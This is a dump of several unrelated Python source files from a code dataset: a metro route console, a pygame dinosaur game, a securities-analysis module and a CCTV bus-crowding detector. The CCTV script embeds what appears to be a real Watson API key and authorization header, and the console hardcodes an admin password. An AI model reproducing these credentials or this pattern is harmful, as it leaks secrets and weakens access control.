resultData\n\n\n def UpdateReportStatus(self,requestRunId, status):\n cur = db.cursor()\n print(\"Report Update Status Function called\")\n try:\n cur.callproc('sp_UpdateReportStatus', args=(requestRunId,status))\n db.commit()\n except Exception as e:\n print(\"Stored Procedure not properly executed - sp_UpdateReportStatus\",str(e))\n\n #db.close()\n return cur\n\n def SaveReportLink(self, requestRunId, reportName):\n reportLink = reportPath+ reportName\n print(\"****************\",reportLink)\n print(reportName)\n print(requestRunId)\n cur = db.cursor()\n print(\"Save Report Link function called\")\n try:\n cur.callproc('sp_UpdateReportLink', args=(requestRunId, reportLink))\n db.commit()\n except Exception as e:\n print(\"Stored Procedure not properly executed --- sp_UpdateReportLink\",str(e))\n\n #db.close()\n return cur\n\n\n\n\n","sub_path":"eCube_Hotel_2/HotelMessaging/Ecube2.0MessagingReportingService/ReportingService/Queues/ReportQueue/DBConnection.py","file_name":"DBConnection.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"369888343","text":"from Metro import Metro\nfrom MetaController import MetaController\nfrom ProjectTools import getProjectPath\nfrom Console import Console\nimport os\n\n\nclass MetroConsole(Console):\n\n password = \"123456\"\n\n def __init__(self) -> None:\n\n super(MetroConsole, self).__init__()\n\n self._filePath = None\n self._meta = MetaController()\n self._metro = None\n\n def define(self) -> None:\n self.newPage(self.pageMain, \"Main\")\n self.newPage(self.pageAdmin, \"Admin\")\n self.newPage(self.pageUser, \"User\")\n self.setJump(\"Main\")\n\n def printMeta(self) -> None:\n self.newBox()\n self.addContentToBox(self._meta.getNameEN())\n self.addContentToBox(\"developer: \" + self._meta.getDeveloper())\n self.addContentToBox(\"code version: \" + self._meta.getCodeVersion())\n self.addContentToBox(\"data version: \" + self._meta.getDataVersion())\n self.drawBox()\n\n def printAdminHint(self) -> None:\n self.newBox()\n self.addContentToBox(\"logout: lot out and return to the main interface\", 5)\n self.addContentToBox(\"list : list the infomation of the designated station or line\", 5)\n self.addContentToBox(\"new : build a new station or line\", 5)\n self.addContentToBox(\"add : add a station to a line:\", 5)\n self.addContentToBox(\"save : save the latest data to a file\", 5)\n self.addContentToBox(\"load : load an existing data file\", 5)\n self.addContentToBox(\"create: create a new data file\", 5)\n self.addContentToBox(\"query : query the line between any station\", 5)\n self.addContentToBox(\"close : close the open file\", 5)\n self.drawBox()\n\n def printUserHint(self) -> None:\n self.newBox()\n self.addContentToBox(\"logout: lot out and return to the main interface\", 5)\n self.addContentToBox(\"list : list the infomation of the designated station or line\", 5)\n self.addContentToBox(\"load : load an existing data file\", 5)\n self.addContentToBox(\"query : query the line between any station\", 5)\n self.drawBox()\n\n def pageMain(self, pageIndex: int) -> None:\n\n vaildOper = {\"user\": self.operTurnToUser, \"admin\": self.operTurnToAdmin,\n \"exit\": self.operExit}\n\n while pageIndex == self._select:\n os.system(\"cls\")\n self.printMeta()\n print(\"\\n Please select the operation Mode(user/admin):\", end=\"\")\n oper, argList = self.inputOper()\n self.dispatcher(oper, argList, vaildOper)\n\n def pageUser(self, pageIndex: int) -> None:\n\n vaildOper = {\"logout\": self.operLogout, \"list\": self.operList,\n \"load\": self.operLoad, \"query\": self.operQuery}\n\n os.system(\"cls\")\n self.printUserHint()\n print(\"\\n Enter you operation:\", end=\"\")\n while pageIndex == self._select:\n oper, argList = self.inputOper()\n os.system(\"cls\")\n self.printUserHint()\n self.dispatcher(oper, argList, vaildOper)\n print(\"\\n Enter you operation:\", end=\"\")\n\n def pageAdmin(self, pageIndex: int) -> None:\n\n vaildOper = {\"logout\": self.operLogout, \"list\": self.operList,\n \"new\": self.operNew, \"add\": self.operAdd,\n \"save\": self.operSave, \"load\": self.operLoad,\n \"create\": self.operCreate, \"query\": self.operQuery,\n \"close\": self.operClose}\n\n os.system(\"cls\")\n self.printAdminHint()\n print(\"\\n Enter you operation:\", end=\"\")\n while pageIndex == self._select:\n oper, argList = self.inputOper()\n os.system(\"cls\")\n self.printAdminHint()\n self.dispatcher(oper, argList, vaildOper)\n print(\"\\n Enter you operation:\", end=\"\")\n\n def operTurnToUser(self, argList: list):\n self.setJump(\"User\")\n\n def operTurnToAdmin(self, argList: list):\n print(\" Please enter your password:\", end=\"\")\n if input() == MetroConsole.password:\n self.setJump(\"Admin\")\n\n def operLogout(self, argList: list):\n self.setJump(\"Main\")\n\n def operList(self, argList: list):\n\n if self._metro is None:\n print(\" You haven't opened a file yet.\")\n return None\n\n stationNames = self._metro.getStationsName()\n lineNames = self._metro.getLinesName()\n stationOrder = self._metro.getStationOrder()\n\n self.newBox()\n for i in range(len(lineNames)):\n self.addContentToBox(\"line: {}\".format(lineNames[i]), 5)\n for j in stationOrder[i]:\n self.addContentToBox(\"{}-->\".format(stationNames[j]), 10)\n self.drawBox()\n\n def operLoad(self, argList: list):\n\n if self._metro is not None:\n print(\" You have already opened a file.\")\n return None\n\n if len(argList) < 1:\n print(\" Wrong number of parameters.\")\n print(\" Usage: load -\")\n return None\n\n self._filePath = getProjectPath() + \"/citys/{}.txt\".format(argList[0])\n if not os.path.exists(self._filePath):\n print(\" File doesn't exist.\")\n self._filePath = None\n return None\n\n print(\" Load data from file: {}...\".format(self._filePath), end=\"\")\n self._metro = Metro(self._filePath)\n print(\" done!\")\n\n def operQuery(self, argList: list):\n\n if self._metro is None:\n print(\" You haven't opened a file yet.\")\n return None\n\n if len(argList) < 2:\n print(\" Wrong number of parameters.\")\n print(\" Usage: query - -\")\n return None\n\n stationNames = self._metro.getStationsName()\n path, weight = self._metro.findPath(argList[0], argList[1])\n\n self.newBox()\n self.addContentToBox(\"You need to take {} stops in the subway\".format(weight), 5)\n for s in path:\n self.addContentToBox(\"{}-->\".format(stationNames[s]), 10)\n self.drawBox()\n\n def operNew(self, argList: list):\n\n if self._metro is None:\n print(\" You haven't opened a file yet.\")\n return None\n\n if len(argList) < 2:\n print(\" Wrong number of parameters.\")\n print(\" Usage: new - -\")\n return None\n\n if argList[0] not in ['s', 'l']:\n print(\" The first parameter must be 's' or 'l'.\")\n return None\n\n if argList[0] == 's':\n try:\n self._metro.newStation(argList[1])\n except Exception:\n print(\" The station has already exist.\")\n return None\n\n if argList[0] == 'l':\n try:\n self._metro.newLine(argList[1])\n except Exception:\n print(\" The line has already exist.\")\n return None\n\n def operAdd(self, argList: list):\n\n if self._metro is None:\n print(\" You haven't opened a file yet.\")\n return None\n\n if len(argList) < 2:\n print(\" Wrong number of parameters.\")\n print(\" Usage: add - - -\")\n return None\n\n try:\n if len(argList) == 2:\n self._metro.addStationToLine(argList[0], argList[1])\n if len(argList) == 3:\n self._metro.addStationToLine(argList[0], argList[1], argList[2])\n except Exception:\n print(\" Error in information.\")\n return None\n\n def operSave(self, argList: list):\n\n if self._metro is None:\n print(\" You haven't opened a file yet.\")\n return None\n\n self._metro.writeToFile(self._filePath)\n\n def operClose(self, argList: list):\n\n if self._metro is None:\n print(\" You haven't opened a file yet.\")\n return None\n\n print(\" Do you want to save the file? (y/n)\", end=\"\")\n oper = input()\n\n if oper not in ['y', 'n']:\n print(\" Colse fail.\")\n return None\n\n if oper == 'y':\n self.operSave(None)\n\n self._metro = None\n self._filePath = None\n\n def operCreate(self, argList: list):\n\n if self._metro is not None:\n print(\" You have already opened a file.\")\n return None\n\n if len(argList) < 1:\n print(\" Wrong number of parameters.\")\n print(\" Usage: add -\")\n return None\n\n _path = getProjectPath() + \"/citys/{}.txt\".format(argList[0])\n if os.path.exists(_path):\n print(\" File already exist.\")\n return None\n\n open(_path, 'w').close()\n Metro.initMetroFile(_path)\n print(\"creat file success!\")\n\n\nif __name__ == \"__main__\":\n MetroConsole().startUp()\n","sub_path":"source/metroconsole.py","file_name":"metroconsole.py","file_ext":"py","file_size_in_byte":8890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"256231788","text":"import pygame\n\nfrom nlc_dino_runner.components.lives.lives import Live\nfrom nlc_dino_runner.components.lives.livesManager import LiveManager\nfrom nlc_dino_runner.components.powerups.power_up_manager import PowerUpManager\nfrom nlc_dino_runner.utils import text_utils\nfrom nlc_dino_runner.components.obstacles.obtaclesManager import ObstaclesManager\nfrom nlc_dino_runner.components.dinosaur import Dinosaur\nfrom nlc_dino_runner.utils.constants import TITLE, ICON, SCREEN_HEIGHT, SCREEN_WIDTH, BG, FPS, CLOUD, GAME_OVER_IMG, DARK_MODE, NORMAL_MODE\n\n\n\nclass Game:\n def __init__(self):\n pygame.init()\n pygame.display.set_caption(TITLE)\n pygame.display.set_icon(ICON)\n self.clock = pygame.time.Clock()\n self.screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n self.playing = False\n self.game_speed = 20\n self.x_pos_bg = 0\n self.y_pos_bg = 360\n self.player = Dinosaur()\n self.obstacles_manager = ObstaclesManager()\n self.power_up_manager = PowerUpManager()\n self.points = 0\n self.running = True\n self.death_count = 0\n self.highest_score = 0\n self.live = Live()\n self.live_manager = LiveManager()\n self.nigth = False\n\n def run(self):\n self.obstacles_manager.reset_obstacles()\n self.power_up_manager.reset_power_ups()\n self.live_manager.reset_lives()\n self.game_speed = 20\n self.player = Dinosaur()\n self.points = 0\n self.playing = True\n while self.playing:\n self.event()\n self.update()\n self.draw()\n\n def event(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.playing = False\n\n def update(self):\n user_input = pygame.key.get_pressed()\n self.player.update(user_input, self.game_speed)\n self.obstacles_manager.update(self)\n self.power_up_manager.update(self.points, self.game_speed, self.player)\n\n def draw(self):\n self.clock.tick(FPS)\n if (self.points // 1000) % 2 == 1:\n self.screen.fill(DARK_MODE)\n self.nigth = True\n else:\n self.screen.fill(NORMAL_MODE)\n self.nigth = False\n #self.screen.fill((255,255,255))\n self.score()\n self.draw_background()\n self.draw_sky()\n self.player.draw(self.screen)\n self.obstacles_manager.draw(self.screen)\n self.power_up_manager.draw(self.screen)\n self.live_manager.draw(self.screen)\n pygame.display.update()\n pygame.display.flip()\n\n def score(self):\n self.points += 1\n if self.points % 100 == 0:\n self.game_speed += 1\n if self.nigth:\n score_element, score_element_rect = text_utils.get_score_element(self.points, (255, 255, 255))\n else:\n score_element, score_element_rect = text_utils.get_score_element(self.points)\n self.screen.blit(score_element, score_element_rect)\n self.player.check_invincibility(self.screen, self.nigth)\n #self.player.check_hammer(self.screen)\n\n def draw_background(self):\n image_width = BG.get_width()\n self.screen.blit(BG, (self.x_pos_bg, self.y_pos_bg))\n self.screen.blit(BG, (self.x_pos_bg + image_width, self.y_pos_bg))\n if self.x_pos_bg <= -image_width:\n self.screen.blit(BG, (self.x_pos_bg + image_width, self.y_pos_bg))\n self.x_pos_bg = 0\n self.x_pos_bg -= self.game_speed\n\n def draw_sky(self):\n image_width = CLOUD.get_width()\n self.screen.blit(CLOUD, (self.x_pos_bg + 1100, self.y_pos_bg - 200))\n #self.screen.blit(CLOUD, (self.x_pos_bg, self.y_pos_bg))\n if self.x_pos_bg > +image_width:\n #self.screen.blit(CLOUD, (self.x_pos_bg + 1100, self.y_pos_bg))\n self.x_pos_bg = 0\n #self.x_pos_bg += self.game_speed - 15\n\n def execute(self):\n while self.running:\n if not self.playing:\n self.show_menu()\n #GAME_THEME.stop()\n\n def show_menu(self):\n self.running = True\n white_color = (255, 255, 255)\n self.screen.fill(white_color)\n self.print_menu_elements()\n pygame.display.update()\n self.handle_key_events_on_menu()\n\n def handle_key_events_on_menu(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.running = False\n self.playing = False\n pygame.display.quit()\n pygame.quit()\n exit()\n if event.type == pygame.KEYDOWN:\n self.run()\n\n def print_menu_elements(self):\n half_screen_height = SCREEN_HEIGHT / 2\n if self.death_count == 0:\n message = \"Press any Key to Start\"\n else:\n message = \"Press any Key to Restart\"\n text, text_rect = text_utils.get_centered_message(message)\n self.screen.blit(text, text_rect)\n\n death_score, death_score_rect = text_utils.get_centered_message(\"Death count: \" + str(self.death_count), height=half_screen_height + 50)\n self.screen.blit(death_score, death_score_rect)\n\n highest, highest_rect = text_utils.get_centered_message(\"Highest score: \" + str(self.highest_score), height=560 , width= 180)\n self.screen.blit(highest, highest_rect)\n\n #Imprimiendo dinosaurio de portada\n self.screen.blit(ICON, ((SCREEN_WIDTH / 2) - 40, (SCREEN_HEIGHT / 3.6)))\n","sub_path":"nlc_dino_runner/components/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":5549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"315651398","text":"\"\"\"\nAuthor: Philip.P\nDate created: 16/03/19\n\nAnalyse financial security (mainly price) data (sourced from Bloomberg or YahooFinance (via API)).\nCan specify ticker:fund name json mapping in config\n\nTODO:\n - Refactor the init in Analysis class to load in the data, fewer setting of start and end dates\n - Charts for lookback performance, limiting the number if more than 5 funds\n - Plotting capabilities for stock charts\n\"\"\"\n\nimport datetime as dt\nimport json\nimport os\nfrom typing import Tuple\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import ticker as mtick\n\nimport utils_date\nfrom securityAnalysis.utils_finance import calc_info_ratio, calc_sharpe_ratio, calc_sortino_ratio, \\\n calculate_annual_return, calculate_annual_volatility\nfrom utils_generic import prep_fund_data\n\nplt.style.use('ggplot')\nplt.tight_layout()\nplt.close()\npd.set_option('display.max_columns', 5)\n\nextract_str_timestamp = lambda d: dt.datetime.strftime(d, \"%Y%m%d\")\n\n\nclass Analysis:\n \"\"\"Analysis of historical security data, providing analytics on performance- will remove nan\n\n Args:\n data: Security price data over time period (assumed daily)\n is_bloomberg: Financial data source, acceptable sources Bloomberg (bbg) or YahooFinance via the API (yfin)\n input_directory: Working directory\n\n\n Attributes:\n run_date: YYYMMDD\n input_directory: Working directory\n output_dir: Output directory\n data: Data to be analysed\n \"\"\"\n\n def __init__(self, data: pd.DataFrame, input_directory: str, is_bloomberg: str) -> None:\n self.run_date = extract_str_timestamp(dt.datetime.now())\n self.wkdir = input_directory\n self.set_output_folder()\n\n if is_bloomberg:\n input_data = utils_date.char_to_date(data)\n\n self.start_date = extract_str_timestamp(input_data.index.min())\n self.end_date = extract_str_timestamp(input_data.index.max())\n print(f\"Data for period runs {self.start_date} to {self.end_date}\")\n\n self.data = input_data\n elif is_bloomberg:\n print(\"Data likely downloaded from Yahoo Finance?\")\n pass\n\n def clean_slice_data(self, input_data: pd.DataFrame) -> pd.DataFrame:\n \"\"\"\n Clean/slice (or both) data by removing NAs from the analysis\n\n Args:\n input_data: Security data in wide, short format\n drop_na\n\n Returns:\n pd.DataFrame\n \"\"\"\n # check for NaN values and drop, alerting user for what has been dropped\n na_secs_names = input_data.columns[input_data.isnull().any()].values\n if len(na_secs_names) > 0:\n print(\"The following securities have NaNs in the dataset and will\"\n \"be included in the analysis: \\n {}\".format(na_secs_names))\n\n clean_data = input_data.dropna(axis=0, inplace=True)\n\n print(f\"Data analysed for period {self.start_date} to {self.end_date}\")\n\n return clean_data\n\n def set_output_folder(self):\n \"\"\"Set output folder according to working directory specified\"\"\"\n output_path = os.path.join(self.wkdir, \"output\", self.run_date)\n self.output_dir = output_path\n if not os.path.exists(self.output_dir):\n os.mkdir(self.output_dir)\n print(f\"Output folder created: {self.output_dir}\")\n\n def annual_return_table(self, data: pd.DataFrame, save_results: bool = True) -> pd.DataFrame:\n \"\"\"Basic summary table of annual returns of stocks\n\n Args:\n data\n save_results: Saves in the self.output_dir\n\n Returns:\n pd.DataFrame\n \"\"\"\n\n input_data = data.copy(True)\n total_annual_rtn = (input_data.groupby(input_data.index.year).last() / input_data.groupby(\n input_data.index.year).first())\n\n annual_rtn = (total_annual_rtn - 1).T\n annual_rtn.index.name = \"Security / Annual Return\"\n\n if save_results:\n annual_rtn.to_csv(f\"{self.output_dir}/{self.run_date}_sec_annual_return.csv\")\n print(f\"Annual returns table saved as csv in {self.output_dir}\")\n return annual_rtn\n\n def performance_summary(self, data: pd.DataFrame, risk_free_rate: float = 0,\n target_return_rate: float = 0,\n to_calculate_risk_measures: bool = True,\n save_results: bool = False) -> pd.DataFrame:\n \"\"\"\n Summarises return and volatility for input data over whole period\n\n Args:\n data: Data to analyse performance of\n risk_free_rate: Annual risk free rate\n target_return_rate: Target rate of (daily) period return\n to_calculate_risk_measures: Include Sharpe and Sortino Ratios in the summary table\n save_results: If True by default will save in self.output_dir\n\n Returns:\n summary: table of returns and volatility of securities entered\n \"\"\"\n\n data_to_clean = data.copy(True)\n\n annual_rtn = calculate_annual_return(data=data_to_clean)\n annual_vol = calculate_annual_volatility(data=data_to_clean)\n info_ratio = calc_info_ratio(data=data_to_clean)\n\n cols = ['Annual Return', 'Annual Volatility', 'Info Ratio']\n summary = pd.concat([annual_rtn, annual_vol, info_ratio], axis=1)\n summary.columns = cols\n\n if to_calculate_risk_measures:\n if risk_free_rate is None:\n risk_free_rate = 0\n\n sharpe = calc_sharpe_ratio(data=data,\n risk_free=risk_free_rate)\n sortino = calc_sortino_ratio(data=data,\n target_return=target_return_rate,\n risk_free=risk_free_rate)\n\n cols += ['Sharpe Ratio', 'Sortino Ratio']\n summary = pd.concat([summary, sharpe, sortino], axis=1)\n summary.columns = cols\n\n summary.dropna(inplace=True)\n summary.index.name = \"Fund/Stock\"\n\n log = \" \".join([\"Fund Stats for\", self.start_date, \"to\", self.end_date])\n errors = data_to_clean.columns.difference(summary.index).values.tolist()\n\n print(log)\n if len(errors) > 0:\n print(f\"There were errors in the dataset for the following funds: \\n {errors}\")\n\n if save_results:\n file_name = \"_\".join([\"securities_summary\", self.start_date, self.end_date, \".csv\"])\n summary.to_csv(os.path.join(f\"{self.output_dir}/{file_name}\"))\n print(f\"Summary table has been written to csv file in directory: {self.output_dir}\")\n\n return summary\n\n # TODO: rewrite as this isn't good in terms of the timedelta\n # def calculate_lookback_performance(\n # self, end_date: np.datetime64 = None,\n # lookback_periods: List[str] = [\"0D\", \"6M\", \"1Y\", \"2Y\", \"3Y\"],\n # to_save_results=False) -> pd.DataFrame:\n # \"\"\"Analyse performance of certain funds over a custom lookback period (list)\n #\n # Args:\n # end_date: If not specified, defaults to last valid date in dataset\n # lookback_periods\n # \"\"\"\n # df = self.data\n #\n # if end_date is None:\n # end_date = self.end_date\n #\n # if lookback_periods is None:\n # lookback_periods = [\"0D\", \"3M\", \"6M\", \"9M\", \"12M\", \"18M\", \"24M\"]\n #\n # # TODO: if a date in the lookback is not in the range of the dataset then we drop this date\n # target_dates = [utils_date.return_date_diff(df, end_date, i) for i in lookback_periods]\n # target_prices = [df.loc[i, :].values for i in target_dates]\n #\n # # iloc[::-1] is to reverse the dataframe by the date index --> earliest to latest\n # lookbackTable = pd.DataFrame.from_records(target_prices, index=target_dates, columns=df.columns)\n # lookbackTable.sort_index(ascending=True, inplace=True)\n #\n # # Period return\n # cumulativeReturn = lookbackTable.apply(lambda x: x / x[0])\n # cumulativeReturn['Return Period'] = lookback_periods\n # cumulativeReturn = cumulativeReturn[cumulativeReturn.columns.tolist()[-1:] +\n # cumulativeReturn.columns.tolist()[:-1]]\n #\n # if to_save_results:\n # fileName = utils_date.date_to_str(self.start_date) + \"_\" + utils_date.date_to_str(self.end_date) + \"_\"\n # writer = pd.ExcelWriter(self.output_dir + fileName + \"Security Performance.xlsx\")\n #\n # lookbackTable.index = lookbackTable.index.values.astype(\"datetime64[D]\")\n # lookbackTable_print = lookbackTable.T\n # lookbackTable_print.to_excel(writer, \"Prices\")\n #\n # cumulativeReturn.index = cumulativeReturn.index.values.astype(\"datetime64[D]\")\n # cumulativeReturn.T.to_excel(writer, \"Return\")\n #\n # writer.save()\n # print(\"Lookback performance table has been written to directory: {dry}\".format(dry=self.output_dir))\n #\n # # Plotting the results\n # # if returnPlot:\n # # data_to_plot = cumulativeReturn.drop(['Return Period'], axis =1)\n # # # plt.figure()\n # # if data_to_plot.shape[1] > 5:\n # # nSubplots = round(data_to_plot.shape[1]/5)\n # # for i in range(nSubplots):\n # # plt.figure()\n # # subset_data = data_to_plot.iloc[:,(5*i):(5*i)+5]\n # # plt.suptitle(\"Normalised Return Securities\" + str(i))\n # # plt.plot(subset_data)\n # # plt.xlabel('Time Period')\n # #\n # #\n # # ax = cumulativeReturn.drop(['Return Period'], axis =1).plot()\n # #\n # # vals = ax.get_yticks()\n # # ax.set_yticklabels(([format(x, ',') for x in vals]))\n # # plt.ylabel(\"Normalised Return\")\n # # plt.grid()\n # # plt.tight_layout()\n # # plt.title(\"Normalised Return for funds\")\n # # plt.legend(loc=\"upper left\", fontsize='xx-small', ncol=2)\n # # plt.savefig(self.output_dir + \"/CumulativeReturn Plot.png\")\n # # plt.close()\n\n @staticmethod\n def return_bollinger_band(data: pd.DataFrame, window: int, std_devs: int\n ) -> Tuple[pd.DataFrame, pd.DataFrame, pd.DataFrame, pd.DataFrame]:\n \"\"\"\n Function to return bollinger bands for securities\n\n Args:\n data: Dataframe of stock prices with index as np.datetime64\n window: Rolling window (in days) for mean price and standard deviation\n std_devs: Number of standard deviations for bollinger band, usually an integer\n\n Returns:\n pd.DataFrame: roll_mean\n pd.DataFrame: roll_std\n pd.DataFrame: boll_high\n pd.DataFrame: boll_low\n \"\"\"\n\n roll_mean = data.rolling(window).mean()\n roll_std = data.rolling(window).std()\n\n boll_high = roll_mean + (roll_std * std_devs)\n boll_low = roll_mean - (roll_std * std_devs)\n\n return roll_mean, roll_std, boll_high, boll_low\n\n def plot_bollinger_bands(self, data: pd.DataFrame, rolling_window: int = 20,\n num_st_devs: int = 2) -> None:\n \"\"\"Function to do bollinger band plots for each of the stocks in the dataframe\"\"\"\n\n for col in data.columns:\n slice = data.loc[:, col]\n normed_px = slice / slice[0]\n\n # Info for bollinger plots, also useful elsewhere\n roll_mn, roll_std, boll_high, boll_low = \\\n Analysis.return_bollinger_band(data=slice,\n window=rolling_window,\n std_devs=num_st_devs)\n\n # Plot the charts\n fig, ax1 = plt.subplots()\n color = 'tab:red'\n ax1.set_xlabel(\"Time\")\n ax1.set_ylabel(\"Price\")\n ax1.plot(roll_mn, color=color)\n # ax1.tick_params(axis='y', labelcolor=color)\n ax1.plot(boll_high, linestyle=\"dashed\", color=\"k\", linewidth=0.5)\n ax1.plot(boll_low, linestyle=\"dashed\", color=\"k\", linewidth=0.5)\n ax1.yaxis.set_major_locator(\n mtick.LinearLocator(6)) # set there to be N=6 lines on y-axis\n\n norm_std_rolling = normed_px.rolling(window=rolling_window).std()\n ax2 = ax1.twinx()\n color = 'tab:blue'\n ax2.set_ylabel('Rolling Volatility')\n ax2.plot(norm_std_rolling, color=color)\n # ax2.tick_params(axis='y', labelcolor=color)\n ax2.set_ylim(0, 0.25)\n ax2.yaxis.set_major_locator(mtick.LinearLocator(6))\n\n plt.suptitle(col + \" (rolling {n}-day window)\".format(n=rolling_window))\n # fig.tight_layout()\n plt.show()\n plt.savefig(f\"{self.output_dir}/{col} Price & Vol History.png\")\n plt.close()\n\n @staticmethod\n def plot_total_return(input_data: pd.DataFrame, output_dir: str, log_returns=False) -> None:\n \"\"\"Plot the normalised return over time, anchored back to start of lookback period\"\"\"\n\n for col in input_data.columns:\n slice = input_data.loc[:, col]\n\n if log_returns:\n normed_px = 1 + np.log(slice / slice[0])\n else:\n normed_px = slice / slice[0]\n\n # Plot the charts\n fig, ax1 = plt.subplots()\n color = 'tab:red'\n ax1.set_xlabel(\"Time\")\n ax1.plot(normed_px, color=color)\n\n if log_returns:\n ax1.set_ylabel(\"Log Total Return\")\n plt.suptitle(col + \" - Log Total Return\")\n else:\n ax1.set_ylabel(\"Total Return\")\n plt.suptitle(col + \" - Total Return\")\n\n plt.show()\n if log_returns:\n plt.savefig(f\"{output_dir}/{col} - Log Total Return Chart.png\")\n else:\n plt.savefig(f\"{output_dir}/{col} - Total Return Chart.png\")\n plt.close()\n\n # def csv_summary(self, output_dir: str) -> None:\n # \"\"\"Print the summary to csv file\"\"\"\n #\n # if output_dir is None:\n # output_dir = self.output_dir\n #\n # writer = pd.ExcelWriter(os.path.join(output_dir, \"Stock Summary Measures.xlsx\"))\n # summary_one = self.summaryTable(toCsv=False, r=0.01) # Summary table- return/volatility/info & sharpe ratio\n #\n # summary_one[['Annualised Return', 'Annual Volatility']] *= 100\n # summary_one[['Annualised Return', 'Annual Volatility']] = \\\n # summary_one[['Annualised Return', 'Annual Volatility']].applymap(\"{0:.2f}%\".format)\n # summary_one[['Information Ratio', 'Sharpe Ratio']] = summary_one[\n # ['Information Ratio', 'Sharpe Ratio']].applymap(\"{0:.4}\".format)\n #\n # summary_one.to_excel(writer, \"Summary Table\")\n #\n # annual_table = self.annualReturns(toCsv=False)\n # annual_table.columns = annual_table.columns.astype(str)\n #\n # print_annual_table = annual_table * 100\n # print_annual_table = print_annual_table.applymap(\"{0:.2f}%\".format)\n # print_annual_table.to_excel(writer, \"Annual Return\")\n #\n # correlation_mat = self.data.corr() # correlation matrix\n # correlation_mat.to_excel(writer, \"Correlation\")\n #\n # writer.save()\n # print(\"Summary statistics produced, and in the following directory: \" + self.output_dir)\n\n\nif __name__ == \"main\":\n from securityAnalysis.securities_analysis import Analysis\n from get_paths import get_config_path\n\n WK_DIR = \"/Users/philip_p/Documents/python/\"\n INPUT_FOLDER = os.path.join(WK_DIR, \"data/finance\")\n OUTPUT_FOLDER = os.path.join(WK_DIR, \"output\")\n df = prep_fund_data(df_path=F\"{INPUT_FOLDER}/funds_stocks_2019.csv\")\n\n with open(get_config_path(\"bbg_ticker.json\")) as f:\n TICKER_MAP_DICT = json.load(f)\n\n rn = Analysis(data=df, input_directory=WK_DIR, is_bloomberg=True)\n clean_df = rn.clean_slice_data(input_data=df)\n results = rn.performance_summary(data=clean_df, save_results=True)\n # rn.plot_bollinger_bands(data=df, window=60)\n\n rn = Analysis(data=df, input_directory=INPUT_FOLDER, is_bloomberg=True)\n # rn.plot_bollinger_bands(data = df[df.index > \"2014-01-01\"])\n\n # # cut the dataframe and only look at the nulls\n # df = df.loc[:, df.isnull().sum() != 0]\n # null_lst = list(df.isnull().sum().values) # list of first null values\n #\n # for i, e in enumerate(null_lst):\n # slice = df.iloc[e:, i]\n # slice.dropna(axis=0, inplace=True)\n # start_date = slice.index[0].strftime(\"%Y-%m-%d\")\n # name = pd.Series(slice).name\n #\n # try:\n # rn = Analysis(data=slice, start_date=start_date, end_date=\"2019-07-05\")\n # except (AttributeError) or (IndexError):\n # rn = Analysis(data=pd.DataFrame(slice), start_date=start_date, end_date=\"2019-07-05\")\n #\n # # rn = Analysis(data=slice, start_date=start_date, end_date=\"2019-07-05\")\n # rn.excel_summary()\n # os.rename(os.path.join(outputDir, \"Stock Summary Measures.xlsx\"),\n # os.path.join(outputDir, \"Stock Summary Measures_\" + name + \".xlsx\"))\n # rn.plot_total_return(data=rn.data, output_dir=outputDir, isLog=True)\n # rn.plot_total_return(data=rn.data, output_dir=outputDir, isLog=False)\n","sub_path":"securityAnalysis/securities_analysis.py","file_name":"securities_analysis.py","file_ext":"py","file_size_in_byte":17598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"28966019","text":"import cv2\nimport numpy as np\nimport requests\nimport json\nimport os\nfrom watson_developer_cloud import VisualRecognitionV3\nfrom database import cursor, db\nimport sched, time\n\n## DETAILS OF VISUAL RECOGNITION MODEL\nvisual_recognition = VisualRecognitionV3('2018-03-19',iam_apikey='YgNSrJcWFSrLlIkng2XsEmY6k-HIer3DShnSNeop8Fue')\n\n## SCHEDULAR FOR RUNNING THE NEXT LINE\ns = sched.scheduler(time.time, time.sleep)\n\n## TO CREATE PATH FOR SAVING THE IMAGES\ntry:\n if not os.path.exists('data'):\n os.makedirs('data')\nexcept OSError:\n print ('Error: Creating directory of data')\n\n## UPDATE FUNCTION\ndef autoupdate (sc):\n\n ## SELECT THE URL AND ID FROM DATABASE\n cctv_url = 'SELECT CCTV_URL, CCTV_ID FROM SCHEDULE'\n cursor.execute(cctv_url)\n result = cursor.fetchall()\n\n ## i DECLARED AS 0 , IT REPRESENTS THE ROWS\n i = 0\n\n ## WHILE LOOP \n while i < 41 :\n url_out = result[i][0]\n _id = result[i][1]\n print (url_out)\n print (_id)\n url = url_out\n print (url)\n img_request = requests.get(url)\n img_arr = np.array(bytearray (img_request.content), dtype= np.uint8)\n img = cv2.imdecode(img_arr,-1)\n name = './data/img' + '.jpg'\n cv2.imwrite(name,img)\n ## IMAGE IS CAPTURED\n\n ## OPENED IN FILE FORMAT\n with open(name, 'rb') as images_file:\n\n ## PUT IN OKAY OR NOT OKAY MODEL\n classes = visual_recognition.classify( images_file, threshold='0.6', classifier_ids='Bus_View_932757643').get_result()\n visual =json.loads(json.dumps(classes, indent=2))\n preds=visual['images'][0]['classifiers'][0]['classes'][0]['class']\n\n ## IF NOT OKAY DECLARED AS CROWDED\n if (preds) == 'Not Okay':\n count = -1\n print(count)\n\n ## IF OKAY PUT INTO HUMAN DETECTION TO GET THE HUMAN COUNT\n else:\n url1 = \"https://gateway.watsonplatform.net/visual-recognition/api/v4/analyze?version=2019-02-11\"\n payload = {'features': 'objects','collection_ids': '465fd7ad-785a-4dab-b64b-08a937c9adcb','threshold': '0.15'}\n files = [('images_file', open(name,'rb'))]\n headers = {'Authorization': 'Basic YXBpa2V5OllnTlNySmNXRlNyTGxJa25nMlhzRW1ZNmstSEllcjNEU2huU05lb3A4RnVl'}\n response = requests.request(\"POST\", url1, headers=headers, data = payload, files = files)\n json_con = json.loads(response.text.encode('utf8'))\n detect = json_con['images'][0]['objects']['collections'][0]['objects']\n count = len(detect)\n print(count)\n \n ## TAKES TO THE NEXT ROW\n i += 1\n print ('loop'+ str(i))\n\n ## 